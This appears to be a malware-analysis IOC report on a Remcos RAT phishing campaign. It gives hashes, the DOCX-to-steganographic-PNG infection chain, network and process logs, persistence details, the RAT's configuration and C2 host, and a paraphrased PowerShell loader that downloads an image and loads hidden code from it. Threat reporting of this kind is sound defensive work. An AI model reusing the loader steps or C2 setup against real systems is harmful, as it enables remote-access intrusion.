#remcos_250124

1. #IOC #OptiData #VR #remcos #RAT #stego #pngbase64 #RegAsm #PowerShell
2.  
3. https://pastebin.com/cud9xwfs
4.  
5. previous_contact:
6. 19/01/24 https://pastebin.com/EvXHfZUB
7. 18/01/24 https://pastebin.com/FL2fX362
8. 25/12/23 https://pastebin.com/D535PVm3
9. 21/12/23 https://pastebin.com/samYnJq6
10. 30/11/23 https://pastebin.com/aG6XyqHN
11. 13/11/23 https://pastebin.com/tbRpiGG5
12. 06/02/23 https://pastebin.com/kjv5E8Au
13.  
14. FAQ:
15. https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
16.  
17. attack_vector
18. --------------
19. email attach .docx (T1221) > get .doc (11882) > get .vbs > get base64 > get .png (stego) > get .txt > decode > inject RegAsm.exe > C2
20.  
21. # # # # # # # #
22. email_headers
23. # # # # # # # #
24. Date: 25 Jan 2024 02:58:03 -0800
25. Subject: Fw: Re: Re: Re: Confirmarea comenzii si plata
26. From: Mert Tural<contact@ laceys_icu>
27. Received: from laceys_icu (HELO mail0_laceys_icu) ([216_9_224_90])
28. Message-ID: <20240125025803.5754DAE9059F10D7@ laceys_icu>
29.  
30. # # # # # # # #
31. files
32. # # # # # # # #
33. SHA-256 e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035
34. File name Copie de plată.docx [ Microsoft Word 2007+ ] !Template Injection
35. File size 30.64 KB (31375 bytes)
36.  
37. SHA-256 1de402b1aa5fcf8a3782a2656b75dd8e943b68e181acc45ef85b32df95f2b640
38. File name microsoftinteroird___.doc [ Rich Text Format ] !11882 EQUATION
39. File size 64.80 KB (66353 bytes)
40.  
41. SHA-256 d8ee4672494c3a0141cad7cfd5ba867b85b7e6b00bec09aad83d0ead054243ae
42. File name ISOupdate.vbs [ JavaScript ] !Detect sandbox
43. File size 156.03 KB (159776 bytes)
44.  
45. SHA-256 652c8b88469fc78b55ce828bf6a7f602e8daac730470ebd7e8cd836d8c1600b9
46. File name d3zoY [ JavaScript ] !Base64 2 PowerShell
47. File size 47.32 KB (48457 bytes)
48.  
49. SHA-256 14d46f274c0a4714fd4d9156edc0f2f695b6d3c650b1e9f0d1b4f286c7caa6a1
50. File name uwp4241942.png [ PNG image data ] !Stego Loader BASE64_START
51. File size 17.73 MB (18594320 bytes)
52.  
53. SHA-256 e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042
54. File name CNF.txt [ Reverse Base64 ] !REMCOS encoded payload
55. File size 644.00 KB (659456 bytes)
56.  
57.  
58. # # # # # # # #
59. activity
60. # # # # # # # #
61.  
62. PL_SCR wallpapercave_com /uwp/uwp4241942.png (LOADER)
63. 172_232_189_152 /359/CNF.txt (REMCOS)
64.  
65. C2 top_noforabusers1_xyz : 2424 147_124_215_172 : 2424
66.  
67. netwrk
68. --------------
69. 172_67_188_27 tau_id 80 HTTP OPTIONS / HTTP/1.1 Microsoft Office Protocol Discovery
70. 172_67_188_27 tau_id 80 HTTP OPTIONS / HTTP/1.1 Microsoft Office Protocol Discovery
71. 172_67_188_27 443 SSLv2 Client Hello
72. 172_67_188_27 tau_id 80 HTTP GET /ze87s HTTP/1.1 Mozilla/4.0 (MSOffice 12)
73. 172_232_189_152 80 HTTP GET /cdf/microsoftinteroird___.doc HTTP/1.1 Mozilla/4.0 (MSOffice 12)
74. 172_67_188_27 tau_id 80 HTTP HEAD /ze87s HTTP/1.1 Microsoft Office Existence Discovery
75. 172_67_188_27 tau_id 80 HTTP HEAD /ze87s HTTP/1.1 Microsoft Office Existence Discovery
76. 172_232_189_152 80 HTTP GET /359/ISOupdate.vbs HTTP/1.1
77. 188_114_97_9 paste_ee 80 HTTP GET /d/d3zoY HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
78. 188_114_97_9 paste_ee 443 TLSv1 Client Hello
79.  
80. 104_22_53_71 wallpapercave_com 443 TLSv1.2 Client Hello
81. 172_232_189_152 80 HTTP GET /359/CNF.txt HTTP/1.1
82. 147_124_215_172 2424 TLSv1.3 Client Hello
83.  
84. comp
85. --------------
86. WINWORD.EXE TCP 172_67_188_27 80 ESTABLISHED
87. WINWORD.EXE TCP 172_67_188_27 443 ESTABLISHED
88. WINWORD.EXE TCP 172_232_189_152 80 ESTABLISHED
89. WScript.exe TCP 188_114_97_9 443 ESTABLISHED
90. powershell.exe TCP 104_22_53_71 443 ESTABLISHED
91. powershell.exe TCP 172_232_189_152 80 ESTABLISHED
92. RegAsm.exe TCP 147_124_215_172 2424 ESTABLISHED
93.  
94. proc
95. --------------
96. C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
97. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
98. "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\ISOupdate.vbs"
99. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command ...
100. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 172_232_189_152 /359 / CNF.txt
101.  
102. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" *.vbs -Destination C:\ProgramData\svch.vbs
103. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
104. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\bitjt"
105. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\llzcugmi"
106. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\wfevvzxcdsr"
107.  
108. persist
109. --------------
110. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.01.2024 13:25
111. Path File not found: C:\ProgramData\svch.vbs.exe
112.  
113. drop
114. --------------
115. %temp%\Temporary Internet Files\Content.IE5\*\microsoftinteroird___[1].doc
116. %temp%\Temporary Internet Files\Content.IE5\*\ze87s[1]
117. %temp%\Temporary Internet Files\Content.IE5\*\ISOupdate[1].vbs
118. C:\Users\operator\AppData\Roaming\ISOupdate[1].vbs
119. %temp%\bitjt
120. %temp%\llzcugmi
121. %temp%\wfevvzxcdsr
122.  
123. # # # # # # # #
124. additional info
125. # # # # # # # #
126. powershell load remcos:
127. --------------
128. imageUrl = 'wallpapercave_com / uwp / uwp4241942.png'
129. webClient = System.Net.WebClient
130. imageBytes = DownloadData(image_Url)
131. imageText = UTF8.GetString(image_Bytes)
132. startFlag = '<<BASE64_START>>; endFlag = <<BASE64_END>>
133. base64Command = image_Text_Substring
134. commandBytes = Convert ::From_Base64String
135. loadedAssembly = : Load (command_Bytes)
136. type = loaded_Assembly_GetType (Aspose.DrawingSpec.PkikAttrCertNB)
137. method = Run . Invoke 172_232_189_152 / 359 / CNF.txt desativado svch C:\ProgramData\ LnkName RegAsm
138.  
139. remcos config
140. --------------
141. {
142. "Version": "4.9.3 Pro",
143. "Host:Port:Password": "top_noforabusers1_xyz : 2424 : 1",
144. "Assigned name": "RemoteHost",
145. "Connect interval": "1",
146. "Install flag": "Disable",
147. "Setup HKCU\\Run": "Enable",
148. "Setup HKLM\\Run": "Enable",
149. "Install path": "Application path",
150. "Copy file": "remcos.exe",
151. "Startup value": "Disable",
152. "Hide file": "Disable",
153. "Mutex": "Rmc-M4OLK2",
154. "Keylog flag": "0",
155. "Keylog path": "Application path",
156. "Keylog file": "logs.dat",
157. "Keylog crypt": "Disable",
158. "Hide keylog file": "Disable",
159. "Screenshot flag": "Disable",
160. "Screenshot time": "10",
161. "Take Screenshot option": "Disable",
162. "Take screenshot title": "",
163. "Take screenshot time": "5",
164. "Screenshot path": "AppData",
165. "Screenshot file": "Screenshots",
166. "Screenshot crypt": "Disable",
167. "Mouse option": "Disable",
168. "Delete file": "Disable",
169. "Audio record time": "5"
170. }
171. # # # # # # # #
172. VT & Intezer
173. # # # # # # # #
174. https://www.virustotal.com/gui/file/e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035/details
175. https://www.virustotal.com/gui/file/1de402b1aa5fcf8a3782a2656b75dd8e943b68e181acc45ef85b32df95f2b640/details
176. https://www.virustotal.com/gui/file/d8ee4672494c3a0141cad7cfd5ba867b85b7e6b00bec09aad83d0ead054243ae/details
177. https://www.virustotal.com/gui/file/652c8b88469fc78b55ce828bf6a7f602e8daac730470ebd7e8cd836d8c1600b9/details
178. https://www.virustotal.com/gui/file/14d46f274c0a4714fd4d9156edc0f2f695b6d3c650b1e9f0d1b4f286c7caa6a1/details
179. https://www.virustotal.com/gui/file/e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042/details
180.  
181. VR